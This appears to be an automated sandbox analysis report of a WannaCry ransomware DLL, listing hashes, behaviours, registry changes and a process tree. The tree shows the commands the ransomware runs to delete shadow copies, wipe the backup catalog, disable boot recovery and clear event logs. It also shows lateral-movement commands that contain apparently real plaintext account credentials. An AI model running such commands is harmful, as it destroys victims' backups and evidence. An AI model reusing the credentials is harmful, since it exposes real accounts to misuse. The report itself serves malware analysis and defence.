Overview
overview
10Static
static
10WannaCry/H...c1.dll
windows7_x64
1WannaCry/H...c1.dll
windows10_x64
1WannaCry/H...81.dll
windows7_x64
10WannaCry/H...81.dll
windows10_x64
10WannaCry/T...7f.dll
windows7_x64
10WannaCry/T...7f.dll
windows10_x64
10WannaCry/T...71.dll
windows7_x64
10WannaCry/T...71.dll
windows10_x64
10WannaCry/T...02.dll
windows7_x64
10WannaCry/T...02.dll
windows10_x64
10WannaCry/T...2f.dll
windows7_x64
10WannaCry/T...2f.dll
windows10_x64
10WannaCry/T...a6.dll
windows7_x64
10WannaCry/T...a6.dll
windows10_x64
10WannaCry/T...3f.dll
windows7_x64
10WannaCry/T...3f.dll
windows10_x64
10WannaCry/T...66.dll
windows7_x64
10WannaCry/T...66.dll
windows10_x64
10WannaCry/T...ba.dll
windows7_x64
10WannaCry/T...ba.dll
windows10_x64
10WannaCry/T...37.dll
windows7_x64
WannaCry/T...37.dll
windows10_x64
10WannaCry/T...10.dll
windows7_x64
10WannaCry/T...10.dll
windows10_x64
10WannaCry/T...f2.dll
windows7_x64
10WannaCry/T...f2.dll
windows10_x64
10WannaCry/T...af.dll
windows7_x64
10WannaCry/T...af.dll
windows10_x64
10WannaCry/T...40.dll
windows7_x64
10WannaCry/T...40.dll
windows10_x64
10WannaCry/T...81.dll
windows7_x64
10WannaCry/T...81.dll
windows10_x64
10Analysis
-
max time kernel
170s -
max time network
205s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
26-12-2020 20:16
Static task
static1
Behavioral task
behavioral1
Sample
WannaCry/HEUR.Trojan-Downloader.Win32.Generic.02c5f1515bf42798728fac17bfe1e4c1.dll
Resource
win7v20201028
Behavioral task
behavioral2
Sample
WannaCry/HEUR.Trojan-Downloader.Win32.Generic.02c5f1515bf42798728fac17bfe1e4c1.dll
Resource
win10v20201028
Behavioral task
behavioral3
Sample
WannaCry/HEUR.Trojan.Win32.Generic.fc4bb3140f35cc8abd681b63096e7b81.dll
Resource
win7v20201028
Behavioral task
behavioral4
Sample
WannaCry/HEUR.Trojan.Win32.Generic.fc4bb3140f35cc8abd681b63096e7b81.dll
Resource
win10v20201028
Behavioral task
behavioral5
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.01bdc6fb077098f4a3b60f4b0e479a7f.dll
Resource
win7v20201028
Behavioral task
behavioral6
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.01bdc6fb077098f4a3b60f4b0e479a7f.dll
Resource
win10v20201028
Behavioral task
behavioral7
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.033f9150e241e7accecb60d849481871.dll
Resource
win7v20201028
Behavioral task
behavioral8
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.033f9150e241e7accecb60d849481871.dll
Resource
win10v20201028
Behavioral task
behavioral9
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0ab2aeda90221832167e5127332dd702.dll
Resource
win7v20201028
Behavioral task
behavioral10
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0ab2aeda90221832167e5127332dd702.dll
Resource
win10v20201028
Behavioral task
behavioral11
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0ab9a60a55cb40fc338e8f4988feee2f.dll
Resource
win7v20201028
Behavioral task
behavioral12
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0ab9a60a55cb40fc338e8f4988feee2f.dll
Resource
win10v20201028
Behavioral task
behavioral13
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0d95f3f64e7782ec7acd3a1b76c276a6.dll
Resource
win7v20201028
Behavioral task
behavioral14
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0d95f3f64e7782ec7acd3a1b76c276a6.dll
Resource
win10v20201028
Behavioral task
behavioral15
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.106e21fb736cb4e7a18a1746ef18e03f.dll
Resource
win7v20201028
Behavioral task
behavioral16
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.106e21fb736cb4e7a18a1746ef18e03f.dll
Resource
win10v20201028
Behavioral task
behavioral17
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1147f2c00d4bfd70169fe034c5965066.dll
Resource
win7v20201028
Behavioral task
behavioral18
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1147f2c00d4bfd70169fe034c5965066.dll
Resource
win10v20201028
Behavioral task
behavioral19
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.12cb506898dac8a271c8b940a9a3dfba.dll
Resource
win7v20201028
Behavioral task
behavioral20
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.12cb506898dac8a271c8b940a9a3dfba.dll
Resource
win10v20201028
Behavioral task
behavioral21
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1d6958990c8c4f5b9b93efa692b84937.dll
Resource
win7v20201028
Behavioral task
behavioral22
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1d6958990c8c4f5b9b93efa692b84937.dll
Resource
win10v20201028
Behavioral task
behavioral23
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1e8e8eb9b0c25208b5c83be09430c010.dll
Resource
win7v20201028
Behavioral task
behavioral24
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1e8e8eb9b0c25208b5c83be09430c010.dll
Resource
win10v20201028
Behavioral task
behavioral25
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.29a9dd686f08aacddacc43a0c57215f2.dll
Resource
win7v20201028
Behavioral task
behavioral26
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.29a9dd686f08aacddacc43a0c57215f2.dll
Resource
win10v20201028
Behavioral task
behavioral27
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2a13081acf353142a3e792683520cfaf.dll
Resource
win7v20201028
Behavioral task
behavioral28
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2a13081acf353142a3e792683520cfaf.dll
Resource
win10v20201028
Behavioral task
behavioral29
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2e5a8ac5174219bcb08d7449e43b1440.dll
Resource
win7v20201028
Behavioral task
behavioral30
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2e5a8ac5174219bcb08d7449e43b1440.dll
Resource
win10v20201028
Behavioral task
behavioral31
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2f76b88b420003516f90062940ef7881.dll
Resource
win7v20201028
Behavioral task
behavioral32
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2f76b88b420003516f90062940ef7881.dll
Resource
win10v20201028
General
-
Target
WannaCry/Trojan-Ransom.Win32.Wanna.m.1d6958990c8c4f5b9b93efa692b84937.dll
-
Size
5.0MB
-
MD5
1d6958990c8c4f5b9b93efa692b84937
-
SHA1
58bc6052ee6a13dc4711ca73df029a694f6e7239
-
SHA256
716954bdf4ef6882a71c8f2aa3981190da7777b50a3988069bb68eed17c7ddc8
-
SHA512
cb1445e197763d3ae28e8b7186a5f57cd8f34cbcba7c627d7004eb6dddbca67526ae721aff62d26c21b3585c0caef698b236194c90619c970099a5eced8d2682
Malware Config
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 3808 bcdedit.exe 2052 bcdedit.exe -
Processes:
wbadmin.exepid process 1764 wbadmin.exe -
Executes dropped EXE 21 IoCs
Processes:
mssecsvc.exemssecsvc.exetasksche.exeopgpz.exe_osc.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exepid process 2424 mssecsvc.exe 3164 mssecsvc.exe 748 tasksche.exe 3820 opgpz.exe 2828 _osc.exe 204 _yjl.exe 1772 _yjl.exe 2652 _yjl.exe 248 _yjl.exe 264 _yjl.exe 272 _yjl.exe 3688 _yjl.exe 1104 _yjl.exe 2736 _yjl.exe 3260 _yjl.exe 3744 _yjl.exe 3512 _yjl.exe 2984 _yjl.exe 1684 _yjl.exe 1728 _yjl.exe 1568 _yjl.exe -
Drops file in System32 directory 7 IoCs
Processes:
mssecsvc.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 mssecsvc.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\D2AYU1VM.cookie mssecsvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\D2AYU1VM.cookie mssecsvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat mssecsvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 mssecsvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE mssecsvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies mssecsvc.exe -
Drops file in Windows directory 2 IoCs
Processes:
rundll32.exemssecsvc.exedescription ioc process File created C:\WINDOWS\mssecsvc.exe rundll32.exe File created C:\WINDOWS\tasksche.exe mssecsvc.exe -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vds.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName vds.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 2540 vssadmin.exe -
Modifies data under HKEY_USERS 42 IoCs
Processes:
_yjl.exemssecsvc.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" mssecsvc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
opgpz.exepid process 3820 opgpz.exe 3820 opgpz.exe 3820 opgpz.exe 3820 opgpz.exe 3820 opgpz.exe 3820 opgpz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
_ftf.exeopgpz.exe_osc.exevssvc.exewbengine.exewevtutil.exewevtutil.exedescription pid process Token: SeAssignPrimaryTokenPrivilege 504 _ftf.exe Token: SeIncreaseQuotaPrivilege 504 _ftf.exe Token: SeSecurityPrivilege 504 _ftf.exe Token: SeTakeOwnershipPrivilege 504 _ftf.exe Token: SeLoadDriverPrivilege 504 _ftf.exe Token: SeSystemtimePrivilege 504 _ftf.exe Token: SeBackupPrivilege 504 _ftf.exe Token: SeRestorePrivilege 504 _ftf.exe Token: SeShutdownPrivilege 504 _ftf.exe Token: SeSystemEnvironmentPrivilege 504 _ftf.exe Token: SeUndockPrivilege 504 _ftf.exe Token: SeManageVolumePrivilege 504 _ftf.exe Token: SeDebugPrivilege 3820 opgpz.exe Token: SeShutdownPrivilege 2828 _osc.exe Token: SeBackupPrivilege 1108 vssvc.exe Token: SeRestorePrivilege 1108 vssvc.exe Token: SeAuditPrivilege 1108 vssvc.exe Token: SeBackupPrivilege 2556 wbengine.exe Token: SeRestorePrivilege 2556 wbengine.exe Token: SeSecurityPrivilege 2556 wbengine.exe Token: SeSecurityPrivilege 3824 wevtutil.exe Token: SeBackupPrivilege 3824 wevtutil.exe Token: SeSecurityPrivilege 2436 wevtutil.exe Token: SeBackupPrivilege 2436 wevtutil.exe -
Suspicious use of WriteProcessMemory 84 IoCs
Processes:
rundll32.exerundll32.exePSEXESVC.exe_ftf.exe_osc.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 368 wrote to memory of 1468 368 rundll32.exe rundll32.exe PID 368 wrote to memory of 1468 368 rundll32.exe rundll32.exe PID 368 wrote to memory of 1468 368 rundll32.exe rundll32.exe PID 1468 wrote to memory of 2424 1468 rundll32.exe mssecsvc.exe PID 1468 wrote to memory of 2424 1468 rundll32.exe mssecsvc.exe PID 1468 wrote to memory of 2424 1468 rundll32.exe mssecsvc.exe PID 4056 wrote to memory of 504 4056 PSEXESVC.exe _ftf.exe PID 4056 wrote to memory of 504 4056 PSEXESVC.exe _ftf.exe PID 4056 wrote to memory of 504 4056 PSEXESVC.exe _ftf.exe PID 504 wrote to memory of 3820 504 _ftf.exe opgpz.exe PID 504 wrote to memory of 3820 504 _ftf.exe opgpz.exe PID 504 wrote to memory of 2828 504 _ftf.exe _osc.exe PID 504 wrote to memory of 2828 504 _ftf.exe _osc.exe PID 504 wrote to memory of 2828 504 _ftf.exe _osc.exe PID 2828 wrote to memory of 2308 2828 _osc.exe cmd.exe PID 2828 wrote to memory of 2308 2828 _osc.exe cmd.exe PID 2308 wrote to memory of 2540 2308 cmd.exe vssadmin.exe PID 2308 wrote to memory of 2540 2308 cmd.exe vssadmin.exe PID 2828 wrote to memory of 1684 2828 _osc.exe cmd.exe PID 2828 wrote to memory of 1684 2828 _osc.exe cmd.exe PID 1684 wrote to memory of 1764 1684 cmd.exe wbadmin.exe PID 1684 wrote to memory of 1764 1684 cmd.exe wbadmin.exe PID 2828 wrote to memory of 912 2828 _osc.exe cmd.exe PID 2828 wrote to memory of 912 2828 _osc.exe cmd.exe PID 912 wrote to memory of 3808 912 cmd.exe bcdedit.exe PID 912 wrote to memory of 3808 912 cmd.exe bcdedit.exe PID 912 wrote to memory of 2052 912 cmd.exe bcdedit.exe PID 912 wrote to memory of 2052 912 cmd.exe bcdedit.exe PID 2828 wrote to memory of 2736 2828 _osc.exe cmd.exe PID 2828 wrote to memory of 2736 2828 _osc.exe cmd.exe PID 2736 wrote to memory of 3824 2736 cmd.exe wevtutil.exe PID 2736 wrote to memory of 3824 2736 cmd.exe wevtutil.exe PID 504 wrote to memory of 204 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 204 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 204 504 _ftf.exe _yjl.exe PID 2828 wrote to memory of 260 2828 _osc.exe cmd.exe PID 2828 wrote to memory of 260 2828 _osc.exe cmd.exe PID 260 wrote to memory of 2436 260 cmd.exe wevtutil.exe PID 260 wrote to memory of 2436 260 cmd.exe wevtutil.exe PID 504 wrote to memory of 1772 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 1772 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 1772 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 2652 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 2652 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 2652 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 248 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 248 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 248 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 264 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 264 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 264 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 272 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 272 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 272 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 3688 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 3688 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 3688 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 1104 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 1104 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 1104 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 2736 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 2736 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 2736 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 3260 504 _ftf.exe _yjl.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\WannaCry\Trojan-Ransom.Win32.Wanna.m.1d6958990c8c4f5b9b93efa692b84937.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\WannaCry\Trojan-Ransom.Win32.Wanna.m.1d6958990c8c4f5b9b93efa692b84937.dll,#12⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\mssecsvc.exeC:\WINDOWS\mssecsvc.exe3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\WINDOWS\tasksche.exeC:\WINDOWS\tasksche.exe /i4⤵
- Executes dropped EXE
-
C:\WINDOWS\mssecsvc.exeC:\WINDOWS\mssecsvc.exe -m security1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\PSEXESVC.exeC:\Windows\PSEXESVC.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\_ftf.exe"_ftf.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\TEMP\opgpz.exe123 \\.\pipe\2ECF9763-3A70-403C-A20C-21B1D7EF93D73⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\_osc.exe"C:\Windows\TEMP\_osc.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet4⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\Windows\system32\vssadmin.exec:\Windows\system32\vssadmin.exe delete shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet5⤵
- Deletes backup catalog
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe cl System4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe cl Security4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
